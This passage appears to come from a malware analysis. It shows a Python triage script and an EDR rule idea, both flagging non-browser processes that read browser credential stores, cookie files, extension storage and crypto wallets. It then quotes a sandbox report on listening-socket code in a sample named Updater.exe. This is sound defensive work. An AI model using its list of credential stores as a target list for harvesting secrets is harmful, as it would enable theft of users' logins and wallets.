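BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SENSITIVE = {"credential_store", "cookie_store", "extension_storage", "desktop_wallet"}


def classify(path: str) -> tuple[str, str]:
    """Map one opened path to (category, detail)."""
    name = path.rsplit("\\", 1)[-1]
    m = EXT_RE.search(path)
    if m:
        return "extension_storage", m.group(1)
    if name in CREDENTIAL_FILES:
        return "credential_store", name
    if name in COOKIE_FILES:
        return "cookie_store", name
    if name in HISTORY_FILES:
        return "history_autofill", name
    low = path.lower()
    for marker in WALLET_MARKERS:
        if marker.lower() in low:
            return "desktop_wallet", marker.strip("\\")
    return "other", name


def triage(report_text: str) -> dict:
    """Group file-open events per process; flag non-browser readers of sensitive stores."""
    per_proc = defaultdict(lambda: defaultdict(set))
    for line in report_text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        proc = m.group("proc").rsplit("\\", 1)[-1]
        cat, detail = classify(m.group("path"))
        per_proc[proc][cat].add(detail)
    findings = {}
    for proc, cats in per_proc.items():
        touched = SENSITIVE & set(cats)
        findings[proc] = {
            "categories": {c: sorted(v) for c, v in cats.items()},
            "flagged": bool(touched) and proc.lower() not in BROWSERS,
        }
    return findings


if __name__ == "__main__":
    for proc, f in triage(SAMPLE_EVENTS).items():
        print(f"{proc}: flagged={f['flagged']}")
        for cat, items in f["categories"].items():
            head = ", ".join(items[:3]) + (", ..." if len(items) > 3 else "")
            print(f"  {cat}: {len(items)} ({head})")
```

The same predicate translates directly into an EDR or Sysmon file-access rule: a read of Login Data, Cookies, key4.db, logins.json or an Extension Settings directory by any image other than the owning browser. Counting distinct extension IDs per process is a useful second signal, since a legitimate tool rarely enumerates dozens of extension stores in one pass.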

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BA23E0 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 35_2_00BA23E0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BA1DD8 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 35_2_00BA1DD8